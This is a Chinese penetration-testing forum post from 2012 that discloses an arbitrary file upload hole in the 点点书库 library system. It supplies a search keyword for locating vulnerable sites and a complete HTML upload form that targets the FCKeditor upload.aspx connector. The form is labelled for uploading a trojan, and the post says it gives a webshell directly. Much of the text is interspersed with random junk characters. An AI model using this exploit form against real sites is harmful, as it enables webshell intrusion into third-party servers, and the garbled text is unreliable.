中国网络渗透测试联盟

标题: 点点书库图书馆系统文件上传漏洞 [打印本页]

作者: admin    时间: 2012-9-10 21:20
标题: 点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞2 n8 d. p8 m3 z! H) j: w3 s
作者:冰锋刺客
; E' N& ?. n( ?  R( k 厂商:点击书(dianjishu.com)# a  K6 k8 g2 U# t4 u- e$ w7 c1 R
日期:2012-6-212 }7 k- r( q9 H+ s
& W, \9 t/ ~. _  i
I 概述
2 J8 i/ L  y3 k. M4 l' V5 [( M   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell- I- |* D. c2 t. s, t* w( I
II 简介  `. z+ G" t4 W) m, I3 p6 c9 z  T
   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
( ~9 E7 u- q9 H 补充一个漏洞; N# \; H4 d3 t+ n$ r
<form id="frmUpload" enctype="multipart/form-data"
4 W$ o2 d+ g. G5 I2 D- L/ g action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
! u1 j3 M+ _, n& q  D: s <input id="btnUpload" type="submit" value="操翻他">
# S% l9 c3 Q$ l9 U8 p( b0 f </form>
6 P9 F; N- ^7 f 你们懂的- @3 x3 e9 t" u' t- |0 T
那傻逼提供还需要改包.
" e# a& {# h* N* C 自己看了下源代码发现fckeditor
0 T- @  @5 _, {$ f% }. q 直接秒杀
% u1 }* }% |- {% p




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2